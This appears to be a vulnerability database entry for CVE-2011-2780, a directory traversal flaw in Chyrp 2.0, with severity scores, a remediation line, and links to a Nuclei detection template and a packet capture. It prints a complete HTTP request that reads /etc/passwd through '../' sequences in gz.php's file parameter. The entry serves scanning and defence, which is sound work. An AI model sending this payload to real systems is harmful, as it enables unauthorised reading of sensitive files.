| Title | Chyrp 2.x - Local File Inclusion |
|---|---|
| Author | daffainfo |
| Severity | Medium |
| Impact | Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. |
| Remediation | Upgrade to the latest version to mitigate this vulnerability. |
| CVSS Score | 5 |
| EPSS Score | 0.0269 |
| CVE ID | CVE-2011-2780 |
| CWE ID | CWE-22 |
| Tags | cve cve2011 lfi chyrp vuln |
A directory traversal vulnerability in includes/lib/gz.php in Chyrp 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter, a different vulnerability than CVE-2011-2744.
GET /includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2011/CVE-2011-2780.yaml
🦈 Packet Capture: ⬇️ Download cve-2011-2780.pcap
N/AN/A